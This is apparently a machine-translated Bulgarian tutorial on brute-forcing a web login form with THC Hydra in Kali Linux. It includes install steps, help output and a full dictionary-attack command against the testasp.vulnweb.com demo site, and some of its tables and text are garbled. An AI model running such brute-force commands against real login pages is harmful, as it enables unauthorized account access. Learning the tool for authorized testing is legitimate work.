Crack уеб базирана страница за вход с Hydra в Kali Linux

Crack Web Based Login Page With Hydra Kali Linux



Паролата е технически определена като таен низ от знаци, използвани за удостоверяване или получаване на достъп до ресурси. То трябва да се пази в тайна и да се скрие от другите, на които няма достъп до тези ресурси. Паролите са били използвани с компютри от най -ранните дни на компютрите. Една от първите системи за споделяне на време е въведена през 1961 г. Тя има команда за вход, която изисква потребителска парола. След като въведете PASSWORD, системата изключва печатащия механизъм, ако е възможно, така че потребителят да може да въведе паролата си с поверителност.

Силата на паролата е функция от дължина, сложност и непредсказуемост. Той измерва ефективността в съпротивата на отгатването или разбиването му. Слабите пароли, от друга страна, съкращават времето, необходимо за отгатване и получаване на достъп до лични/корпоративни имейли, чувствителни данни като финансова информация, бизнес информация, кредитни карти и т.н.







Има много начини паролата да бъде слаба, съответстваща на силата на различните схеми на атака. Най -популярната от този вид атака на идентификационни данни е грубата сила. това е метод на проба и грешка като отгатване, опит за декодиране на криптирани данни като парола или криптиране на данни, използвани от приложна програма или инструмент за хакерство.



Hydra е най -бързият кракер за влизане в мрежа, който поддържа множество протоколи за атака. Той е много бърз и гъвкав, а новите модули се добавят лесно. Този инструмент дава възможност на изследователите и консултантите по сигурността да покажат колко лесно би било да се получи неоторизиран достъп до система от разстояние. Hydra е написан от van Hauser и допълнително подкрепен от David Maciejak. В последната актуализация разработката на hydra е преместена в публичното хранилище на github на адрес: https://github.com/vanhauser-thc/thc-hydra.



Hydra беше тествана за компилиране на Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry и се предлага под GPLv3 със специално разширение за лиценз OpenSSL.





THC Hydra поддържа следните протоколи: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -FORM-GET, HTTP (S) -FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD , HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 и v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC и XMPP.

СРАВНЯВАНЕ НА HYDRA С ДРУГИ НАРУШВАЩИ ИНСТРУМЕНТИ

Освен хидра има и много инструменти за пробиване на вход, но никой не поддържа огромен списък от протоколи и поддръжка на паралелизирани пароли за вход като гидра. Таблиците по -долу показват резултатите от функциите, услугите и сравнението на скоростта спрямо medusa и ncrack.



Характеристика

Отличителен белег Хидра медузи Нкрак
Разрешително AGPLv3 GPLv2 GPLv2 + Nmap условия
Поддръжка на IPv6 Да Не Не
Графичен потребителски интерфейс Да Да Не
Интернационализирана поддръжка (RFC 4013) Да Не Не
Поддръжка на HTTP прокси Да Да Не
SOCKS прокси поддръжка Да Не Не
Поддържани протоколи 51 22 7

Услуги

Crack уеб базирана страница за вход с

Обслужване Подробности Хидра медузи Нкрак
ADAM-6500 Да Не Не
АФП Да Да Не
Звездичка Да Не Не
Парола на Cisco Да Не Не
Cisco Enable Да Не Не
CVS Да Да Не
Жар -птица Да Не Не
FTP Да Да Да
Поддръжка на SSL AUTH TLS & FTP през SSL AUTH TLS & FTP през SSL Не
HTTP Метод (и) ВЗЕМЕТЕ, ГЛАВА, ПОСТ ПОЛУЧАВАЙТЕ ПОЛУЧАВАЙТЕ
Основно удостоверяване Да Да Да
HTTP формуляр Метод (и) ВЗЕМИ, ПОСТ ВЗЕМИ, ПОСТ Не
Поддръжка на SSL HTTPS HTTPS Не
HTTP прокси Основно удостоверяване Да Не Не
DIGEST-MD5 Auth Да Не Не
NTLM Auth Да Не Не
Поддръжка на SSL HTTPS Не Не
Преброяване на URL адреси на HTTP PROXY Да Не Не
ICQ v5 Да
1
Не Не
IMAP LOGIN поддръжка Да Да Не
Поддръжка на AUTH LOGIN Да Не Не
AUTH PLAIN поддръжка Да Да Не
AUTH CRAM-MD5 поддръжка Да Не Не
AUTH CRAM-SHA1 поддръжка Да Не Не
AUTH CRAM-SHA256 поддръжка Да Не Не
AUTH DIGEST-MD5 поддръжка Да Не Не
AUTH NTLM поддръжка Да Да Не
AUTH SCRAM-SHA1 поддръжка Да Не Не
Поддръжка на SSL IMAPS & STARTTLS IMAPS & STARTTLS Не
IRC Обща парола на сървъра Да Не Не
Парола за режим OPER Да Не Не
LDAP v2, проста поддръжка Да Не Не
v3, проста поддръжка Да Не Не
v3, AUTH CRAM-MD5 поддръжка Да Не Не
AUTH DIGEST-MD5 поддръжка Да
AUTH NTLM поддръжка Да Да
AUTH SCRAM-SHA1 поддръжка Да
Поддръжка на SSL IMAPS & STARTTLS IMAPS & STARTTLS
IRC Обща парола на сървъра Да
Парола за режим OPER Да
LDAP v2, проста поддръжка Да
v3, проста поддръжка Да
v3, AUTH CRAM-MD5 поддръжка Да
v3, AUTH DIGEST-MD5 поддръжка Да
MS-SQL Да Да
MySQL v3.x Да Да
v4.x Да Да
v5.x Да Да
NCP Да Да
NNTP Поддръжка на ПОТРЕБИТЕЛЯ Да Да
Поддръжка на AUTH LOGIN Да
AUTH PLAIN поддръжка Да
AUTH CRAM-MD5 поддръжка Да
AUTH DIGEST-MD5 поддръжка Да
AUTH NTLM поддръжка Да
Поддръжка на SSL STARTTLS & NNTP през SSL
Oracle База данни Да Да
Слушател на TNS Да
SID изброяване Да
PC-NFS Да
pcAnywhere Родно удостоверяване Да Да
Удостоверяване на базата на ОС (MS) Да
POP3 Поддръжка на ПОТРЕБИТЕЛЯ Да Да Да
Поддръжка на APOP Да
Поддръжка на AUTH LOGIN Да Да
AUTH PLAIN поддръжка Да Да
AUTH CRAM-MD5 поддръжка Да
AUTH CRAM-SHA1 поддръжка Да
AUTH CRAM-SHA256 поддръжка Да
AUTH DIGEST-MD5 поддръжка Да
AUTH NTLM поддръжка Да Да
Поддръжка на SSL POP3S & STARTTLS POP3S & STARTTLS POP3S
PostgreSQL Да Да
Звездичка Да
ПРСР Работна станция на Windows Да Да Да
Windows Server Да Да
Удостоверяване на домейн Да Да
REDIS Да Не
REXEC Да Да
ВХОД Да Да
RPCAP Да Не
RSH Да Да
RTSP Да Не
SAP R / 3 Да
Siemens S7-300 Да
SIP Да
Поддръжка на SSL SIP през SSL
SMB Режим NetBIOS Да Да Не
W2K собствен режим Да Да Да
Режим на хеш Да Да Не
Удостоверяване на изчистен текст Да Да
LMv1 авт Да Да Да
LMv2 авт Да Да Да
NTLMv1 авт Да Да Да
NTLMv2 авт Да Да Да
SMTP Поддръжка на AUTH LOGIN Да Да
AUTH PLAIN поддръжка Да Да
AUTH CRAM-MD5 поддръжка Да
AUTH DIGEST-MD5 поддръжка Да
AUTH NTLM поддръжка Да Да
Поддръжка на SSL SMTPS & STARTTLS SMTPS & STARTTLS
SMTP потребителско изброяване VRFY cmd Да Да
EXPN cmd Да Да
RCPT TO cmd Да Да
SNMP v1 Да Да
v2c Да Да
v3 (Само за MD5/SHA1)
ЧОРАПИ v5, Удостоверяване с парола Да
SSH v1 Да
v2 Да Да Да
SSH ключове v1, v2 Да
Subversion (SVN) Да Да
TeamSpeak TS2 Да
Telnet Да Да Да
XMPP Поддръжка на AUTH LOGIN Да
AUTH PLAIN поддръжка Да
AUTH CRAM-MD5 поддръжка Да
AUTH DIGEST-MD5 поддръжка Да
AUTH SCRAM-SHA1 поддръжка Да
VMware Auth Daemon v1.00 / v1.10 Да Да
Поддръжка на SSL Да Да
VNC Поддръжка на RFB 3.x парола Да Да
RFB 3.x поддръжка на потребител+парола (Само UltraVNC)
Поддръжка на RFB 4.x парола Да Да
RFB 4.x поддръжка на потребител+парола (Само UltraVNC)

Сравнение на скоростта

Скорост (в s) Хидра медузи Нкрак
1 Задача / FTP модул 11.93 12.97 18.01
4 задачи / FTP модул 4.20 5.24 9.01
16 Задачи / FTP модул 2.44 2.71 12.01
1 модул Task / SSH v2 32,56 33,84 45.02
4 задачи / модул SSH v2 10.95 Счупен Пропуснати
16 Задачи / SSH v2 модул 5.14 Счупен Пропуснати

Това беше кратко просто въведение в хидра. Сега нека преминем към инсталацията.

МОНТАЖ НА HYDRA

Hydra е предварително инсталиран на kali linux, но ако имате различна операционна система, можете да я компилирате и инсталирате на вашата система. Понастоящем поддръжката на hydra на различни платформи:

  • Всички UNIX платформи (Linux, *bsd, Solaris и др.)
  • MacOS (основно клонинг на BSD)
  • Windows с Cygwin (както IPv4, така и IPv6)
  • Мобилни системи, базирани на Linux, MacOS или QNX (напр. Android, iPhone, Blackberry 10, Zaurus, iPaq)

За да изтеглите, конфигурирате, компилирате и инсталирате hydra, просто напишете в терминала:

git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra ./configure make make install 

Ако имате Ubuntu/Debian, ще ви трябват някои библиотеки за зависимости:

apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev 

Ако не можете да намерите тези библиотеки във вашето хранилище, трябва да ги изтеглите и инсталирате ръчно.

КАК ДА ИЗПОЛЗВАТЕ HYDRA

Поздравления, сега успяхте да инсталирате hydra на вашата система. Всъщност Hydra се предлага с два вкуса, GUI-gtk и любимата ми, CLI версия. и в допълнение hydra има и CLI ръководена версия, наречена hydra-wizard. Ще бъдете ръководени стъпка по стъпка, вместо да въвеждате всички команди или аргументи ръчно в терминала. За да стартирате hydra, от типа на терминала си:

За CLI:

hydra

За CLI-съветника:

hydra-wizard

За GUI:

xhydra

След като въведете „hydra“, тя ще покаже помощни команди като тази:

 [email protected] :~# hydra -h Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] Options: -R restore a previous aborted/crashed session -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type '-x -h' to get help -e nsr try 'n' null password, 's' login as pass and/or 'r' reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated 'login:pass' format, instead of -L/-P options -M FILE list of servers to be attacked in parallel, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel (per host, default: 16) -w / -W TIME waittime for responses (32s) / between connects per thread -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -U service module usage details server the target server (use either this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help) Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-head http[s]-post-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-crammd5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0. The newest version is always available at http://www.thc.org/thc-hydra These services were not compiled in: sapr3 oracle. Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup. E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://) % export HYDRA_PROXY_HTTP=http://proxy:8080 % export HYDRA_PROXY_AUTH=user:pass Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh

Bruteforce уеб базиран вход с hydra

Hydra поддържа някои bruteforcing услуги, както споменах по-рано, един от тях се използва за bruteforce уеб базирани влизания като, формуляр за вход в социални медии, формуляр за вход в потребителско банкиране, уеб базиран вход на вашия рутер и т.н. Този http [s] -get-form който ще обработи това искане. В този урок ще ви покажа как да bruteforce уязвими уеб влизания. Преди да задействаме хидра трябва да знаем някои необходими аргументи като по -долу:

  • Цел : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
  • Потребителско име за вход : администратор (ако не сте сигурни, bruteforce това)
  • Списък с пароли : Местоположението на списъка с файлове на речника, съдържащ възможни пароли.
  • Параметри на формуляра : като цяло използвайте данни за подправяне или прокси, за да получите параметрите на формуляра за заявка. Но тук използвам iceweasel, базирана на firefox, лента с инструменти за разработчици на мрежа.
  • Сервизен модул : http-post-form
Help for module http-post-form: ============================================================================ Module http-post-form requires the page and the parameters for the web form. By default this module is configured to follow a maximum of 5 redirections in a row. It always gathers a new cookie from the same URL without variables The parameters take three ':' separated values, plus optional values. (Note: if you need a colon in the option string as value, escape it with ':', but do not escape a '' with '\'.) Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)] First is the page on the server to GET or POST to (URL). Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the '^USER^' and '^PASS^' placeholders (FORM PARAMETERS) Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by 'F=', successful condition login check must be preceded by 'S='. This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter! The following parameters are optional: C=/page/uri to define a different page to gather initial cookies from (h|H)=My-Hdr: foo to send a user defined HTTP header with each request ^USER^ and ^PASS^ can also be put into these headers! Note: 'h' will add the user-defined header at the end regardless it's already being sent by Hydra or not. 'H' will replace the value of that header if it exists, by the one supplied by the user, or add the header at the end Note that if you are going to put colons (:) in your headers you should escape them with a backslash (). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.

Получаване на параметри на публикацията с помощта на браузър, iceweasel/firefox

В браузъра си firefox натиснете клавишите „ CTRL + SHIFT + Q ‘. След това отворете страницата за вход в мрежатаhttp://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F, ще забележите, че в раздела за мрежови програмисти се появява някакъв текст. Той ви казва какви файлове се прехвърлят към нас. Вижте метода, всички са GET, тъй като все още не сме публикували никакви данни.

За да получите параметрите след формуляра, въведете каквото и да е във формуляра за потребителско име или парола. Ще забележите нов POST метод в раздела за мрежови програмисти. Щракнете двукратно върху този ред, в раздела Заглавки щракнете върху Редактиране и повторно изпращане отдясно. В тялото на заявката копирайте последния ред, като напр tfUName = asu & tfUPass = raimu . на tfUName и tfUPass са параметрите, от които се нуждаем. Както се вижда по -долу:

Kali linux има куп списъци с думи, изберете подходящия списък с думи или просто използвайте rockyou.txt място в /usr/share/wordlists/ както се вижда по -долу:

Добре, сега имаме всички необходими аргументи и сме готови да задействаме хидра. Ето модела на командите:

hydra -l -P [/code] Finally, based on information we have gathered, our commands ahould look something like this: hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form '/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout' -vV -f

Нека разбием командите:

  • на : е дума, съдържаща акаунт за потребителско име, използвайте -L, за да препратите списъка с възможни потребителски имена във файл.
  • P : е списък на файлове с възможна парола, използвайте -p, за да използвате буквално парола с една дума, вместо да я познаете.
  • testapp.vunlwebapp.com : е име на хост или цел
  • http-post-формуляр : е сервизният модул, който използваме
  • /Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout = трите необходими параметъра, синтаксисът е:
    {URL URL} на страница:: {Request post body form form options}: S = {Намерете каквото и да е на страницата след успешно влизане}
  • v = Подробен режим
  • V = показване на вход: пропуск за всеки опит
  • е = Прекратете програмата, ако се намери вход за двойка: парола

Нека сега позволим на Hydra да се опита да пробие паролата вместо нас, необходимо е време, тъй като това е атака по речник. След като успеете да намерите двойка данни за вход: парола хидра веднага ще прекрати работата и ще покаже валидните идентификационни данни.

Hydra може да направи толкова много, тъй като в този урок току-що научихме как да bruteforce уеб базирано влизане с помощта на hydra, ние научаваме само един протокол, това е http-post-form протокол. Можем също да използваме hydra срещу друг протокол като ssh, ftp, telnet, VNC, прокси и т.н.